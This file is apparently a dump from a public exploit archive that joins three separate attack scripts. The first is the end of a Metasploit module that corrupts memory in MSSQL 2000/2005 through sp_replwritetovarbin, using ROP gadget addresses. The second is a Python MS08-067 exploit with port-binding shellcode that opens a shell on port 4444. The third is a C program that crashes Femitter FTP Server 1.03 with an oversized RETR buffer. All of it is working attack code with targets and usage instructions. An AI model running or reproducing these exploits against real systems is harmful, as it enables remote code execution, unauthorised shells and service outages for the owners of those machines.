{
'Num' => 32, # value for "start_offset"
'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
'Vtable' => 0x0244c803, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x17139e9, # not directly used - call [ecx+0x14]
'Disp' => 0x52, # displacement on call [ecx+disp] used
'ecx2esp' => 0x0183bf9c, # push ecx / pop esp / pop ebp / ret
'Popped' => 0x4, # byte count popped in above (before ret)
'Offset' => 0x20, # offset to the new stack!
'FixESP' => 0x014923c1, # advance esp to next ret (add esp,0x10 / ret)
'Ret' => 0x011b204c # jmp esp
},
],
[
# Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
# Feb 9 2007 22:47:07
'MSSQL 2005 SP2 (9.00.3042.00)',
{
'Num' => 32, # value for "start_offset"
'VtOff' => 63, # offset from 'Num' to smashed vtable ptr
'VtDisp' => 0x10, # displacement from mov eax,[edx+0x10] / call eax crash
'Writable' => 0x53ad5330, # any writable addr (not even necessary really)
'Vtable' => 0x027fca52, # becomes eax for [eax+0x38] (must be valid to exec)
'FixDisp' => 0x1106d6b, # not directly used - call [ecx+0x14]
'Disp' => 0x52, # displacement on call [ecx+disp] used
'ecx2esp' => 0x01849641, # push ecx / pop esp / pop ebp / ret
'Popped' => 0x4, # byte count popped in above (before ret)
'Offset' => 0x20, # offset to the new stack!
'FixESP' => 0x01498b22, # advance esp to next ret (add esp,0x10 / ret)
'Ret' => 0x010a5379 # jmp esp
},
],
[ 'CRASHER', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 09 2008'
))
register_options(
[
OptBool.new('VERBOSE', [ false, 'Enable verbose output', false ])
])
end
def check
# the ping to port 1434 method has two drawbacks...
# #1, it doesn't work on mssql 2005 or newer (localhost only listening)
# #2, it doesn't give an accurate version number (sp/os)
# since we need to have credentials for this vuln, we just login and run a query
# to get the version information
if not (version = mssql_query_version)
return Exploit::CheckCode::Safe
end
print_status("@@version returned:\n\t" + version)
# Any others?
return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.194/)
return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.384/)
return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.534/)
return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.760/)
return Exploit::CheckCode::Vulnerable if (version =~ /8\.00\.2039/)
return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.1399\.06/)
return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.2047\.00/)
return Exploit::CheckCode::Vulnerable if (version =~ /9\.00\.3042\.00/)
return Exploit::CheckCode::Safe
end
def exploit
mytarget = nil
if target.name =~ /Automatic/
print_status("Attempting automatic target detection...")
version = mssql_query_version
raise RuntimeError, "Unable to get version!" if not version
if (version =~ /8\.00\.194/)
mytarget = targets[1]
elsif (version =~ /8\.00\.384/)
mytarget = targets[2]
elsif (version =~ /8\.00\.534/)
mytarget = targets[3]
elsif (version =~ /8\.00\.760/)
mytarget = targets[4]
elsif (version =~ /8\.00\.2039/)
mytarget = targets[5]
elsif (version =~ /9\.00\.1399\.06/)
mytarget = targets[6]
elsif (version =~ /9\.00\.2047\.00/)
mytarget = targets[7]
elsif (version =~ /9\.00\.3042\.00/)
mytarget = targets[8]
end
if mytarget.nil?
raise RuntimeError, "Unable to automatically detect the target"
else
print_status("Automatically detected target \"#{mytarget.name}\"")
end
else
mytarget = target
end
sqlquery = %Q|declare @i int,@z nvarchar(4000)
set @z='declare @e int,@b varbinary,@l int;'
set @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
exec sp_executesql @z|
# just crash it with a pattern buffer if the CRASHER target is selected..
if mytarget.name == 'CRASHER'
sploit = Rex::Text.pattern_create(2048)
print_status("Attempting to corrupt memory to cause an exception!")
num = 32
else
# trigger the memory corruption
num = mytarget['Num']
vt_off = mytarget['VtOff']
vt_disp = mytarget['VtDisp']
vtable = mytarget['Vtable']
ecx_disp = mytarget['Disp']
esp_off = mytarget['Offset']
hijack_esp = mytarget['ecx2esp']
first_esp = mytarget['Popped']
fix_esp = mytarget['FixESP']
writable = mytarget['Writable']
corruptable_bytes = 0x44
# make sploit buff
sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
#sploit = Rex::Text.pattern_create(sz)
sploit = rand_text_alphanumeric(sz)
# remove displacement! (using call [ecx+displacement])
vtable_off = (num + vt_off)
sploit[vtable_off,4] = [(vtable - vt_disp)].pack('V')
# stack -> heap
hijack_off = vtable_off + ecx_disp
sploit[hijack_off,4] = [hijack_esp].pack('V')
# becomes eax on mssql 2ksp4 (prevent crash)
sploit[(vtable_off-4),4] = [writable].pack('V')
# becomes eip after esp hijack
fixesp_off = vtable_off + first_esp
sploit[fixesp_off,4] = [fix_esp].pack('V')
# rest of magic stack (disable DEP?)
stack_off = vtable_off + esp_off
stack = []
stack << mytarget['Ret']
stack = stack.pack('V*')
# jump over the stuff that gets corrupted
stack << "\xeb" + [corruptable_bytes].pack('C')
stack << rand_text_alphanumeric(corruptable_bytes)
stack << payload.encoded
sploit[stack_off,stack.length] = stack
# this has to be put in after the stack area since the ptr for sql2k sp1 is in the corrupted stuff
sploit[hijack_off,4] = [hijack_esp].pack('V')
print_status("Redirecting flow to %#x via call to our faked vtable ptr @ %#x" % [mytarget['FixDisp'], vtable])
end
# encode chars that get modified
enc = mssql_encode_string(sploit)
# put the number in (start offset)
runme = sqlquery.gsub(/%NUM%/, num.to_s)
runme.gsub!(/%STUFF%/, enc)
# go!
print_status('The SQL Server will probably die after exploitation. Follow the "POSTEXPLOITATION" instructions in the README file')
begin
mssql_query(runme, datastore['VERBOSE'])
rescue ::Errno::ECONNRESET, EOFError
print_error("Error: #{$!}")
end
handler
disconnect
end
def mssql_str_to_chars(str)
ret = ""
str.unpack('C*').each do |ch|
ret += "+" if ret.length > 0
ret += "char("
ret << ch.to_s
ret += ")"
end
return ret
end
def mssql_encode_string(str)
badchars = "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
enc = ""
in_str = true
str.unpack('C*').each do |ch|
# double-double single quotes
if ch == 0x27
if not in_str
enc << "+'"
in_str = true
end
enc << ch.chr * 4
next
end
# double backslashes
if ch == 0x5c
if not in_str
enc << "+'"
in_str = true
end
enc << ch.chr * 2
next
end
# convert any bad stuff to char(0xXX)
if ((idx = badchars.index(ch.chr)))
enc << "'" if in_str
enc << "+char(0x%x)" % ch
in_str = false
else
enc << "+'" if not in_str
enc << ch.chr
in_str = true
end
end
enc << "+'" if not in_str
return enc
end
def mssql_query_version
delay = 5
# Let's first check that we can reach the host with no problems
t = Time.now
res = mssql_query("select @@version",datastore['VERBOSE'])
response_time = Time.now-t
if (response_time > delay)
return nil
end
# Now we test the SQL Server versions
versions = %w[8.00.194 8.00.384 8.00.534 8.00.760 8.00.2039 9.00.1399.06 9.00.2047.00 9.00.3042.00]
versions.each_with_index { |version,i|
t = Time.now
res = mssql_query("if ((select PATINDEX('%#{version}%', @@version))>0)WAITFOR DELAY '00:00:#{delay.to_s}'",datastore['VERBOSE'])
response_time = Time.now-t
if (response_time > delay)
return version
end
}
return nil
end
end
Debasis Mohanty/MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) ( windows)
#!/usr/bin/env python
#############################################################################
# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)
# www.hackingspirits.com
# www.coffeeandsecurity.com
# Email: d3basis.m0hanty @ gmail.com
#############################################################################
import struct
import sys
from threading import Thread #Thread is imported incase you would like to modify
#the src to run against multiple targets.
try:
from impacket import smb
from impacket import uuid
from impacket.dcerpc import dcerpc
from impacket.dcerpc import transport
except ImportError, _:
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
print '#######################################################################'
print '# MS08-067 Exploit by Debasis Mohanty (aka Tr0y/nopsled)'
print '# www.hackingspirits.com'
print '# www.coffeeandsecurity.com'
print '# Email: d3basis.m0hanty @ gmail.com'
print '#######################################################################\n'
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
#Payload for Windows 2000 target
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'
#Payload for Windows 2003[SP2] target
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'
if sys.argv[2]=='1': #Windows 2000 Payload
payload=payload_1
print '[-]Windows 2000 payload loaded'
if sys.argv[2]=='2': #Windows 2003[SP2] Payload
payload=payload_2
print '[-]Windows 2003[SP2] payload loaded'
class SRVSVC_Exploit(Thread):
def __init__(self, target, osver, port=445):
super(SRVSVC_Exploit, self).__init__()
self.__port = port
self.target = target
self.osver = osver
def __DCEPacket(self):
print '[-]Initiating connection'
self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
self.__trans.connect()
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target
self.__dce = self.__trans.DCERPC_class(self.__trans)
self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
# Constructing Malicious Packet
self.__stub='\x01\x00\x00\x00'
self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
self.__stub+=shellcode
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
self.__stub+=payload
self.__stub+='\x00\x00\x00\x00'
self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
self.__stub+='\x01\x00\x00\x00'
return
def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation
print '[-]Exploit sent to target successfully...\n[1]Telnet to port 4444 on target machine...'
if __name__ == '__main__':
try:
target = sys.argv[1]
osver = sys.argv[2]
except IndexError:
print '\nUsage: %s <target ip> <os version>\n' % sys.argv[0]
print 'Example: srvsvcexpl.py 192.168.1.1 2\n'
print 'Select OS Version'
print '[-]Windows 2000: OS Version = 1'
print '[-]Windows 2003[SP2]: OS Version = 2'
sys.exit(-1)
current = SRVSVC_Exploit(target, osver)
current.start()
#print '[-]Exploit sent to target successfully...\n[-]Telnet to port 4444 on target machine...'
# milw0rm.com [2008-11-16]
LiquidWorm/Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC ( php)
/*0-----------------------------------------------------------------------------------0*\
0 0
| |
| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC |
| |
| Summary: Femitter Server is an easy-to use HTTP and FTP server application |
| for Windows which allows you to use your own computer for sharing gigabytes |
| of files with your friends and colleagues. |
| |
| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability |
| and memory corruption that causes the application to crash. When we send to |
| the RETR command an argument like AAAA:AAAA or an overly long string of As |
| (1024), the server crashes instantly. Also, when typing into browser: |
| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), |
| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at |
| address 004A218A in module "fem.exe". Write of address 00000000. |
| |
| Producst web page: http://acritum.com/fem/index.htm |
| |
| Tested on Microsoft Windows XP SP2 (English) |
| |
| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic |
| |
| liquidworm [t00t] gmail.com |
| |
| http://www.zeroscience.org/ |
| |
| 17.09.2008 |
| |
0 0
\*0-----------------------------------------------------------------------------------0*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"
void header(void);
int main (int argc, char *argv[])
{
int sckt = 0, sfd = 0;
char user[] = "USER admin\r\n";
char pass[] = "PASS nimda\r\n";
unsigned char payload[]=
"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\xD\xA";
header();
if(argc != 3)
{
printf("\nUsage: %s [ip] [port]\n\n", argv[0]);
return (EXIT_SUCCESS);
}
struct sockaddr_in dos_ftp;
sfd = socket(AF_INET, SOCK_STREAM, 0);
if(sfd < 0)
{
perror("Socket");
printf("Error creating socket...\n");
return(1);
}
printf("\n\n[+] Socket created!\n");
sleep (1);
memset(&dos_ftp, 0x0, sizeof(dos_ftp));
dos_ftp.sin_family = AF_INET;
dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
dos_ftp.sin_port = htons(atoi(argv[2]));
sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));
if(sckt < 0)
{
perror("Connect");
printf("Error connecting...\n");
return(1);
}
printf("[+] Connection established!\n");
sleep (1);
write(sfd, user, strlen(user)); // username
printf("[+] Sending CMD: %s\n", user);
sleep (2);
write(sfd, pass, strlen(pass)); // password
printf("[+] Sending CMD: %s\n", pass);
sleep (2);
printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]);
sleep(2);
send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);
printf("[+] Malicious buffer succesfully sent...\n");
sleep (1);
printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);
close (sfd);
return(0);
}
void header()
{
printf("\n********************************************************************************\n\n");
printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n");
printf("\t\t\tby LiquidWorm <liquidworm [t00t] gmail.com>\n\n");
printf("********************************************************************************\n\n");
}
// milw0rm.com [2008-09-17]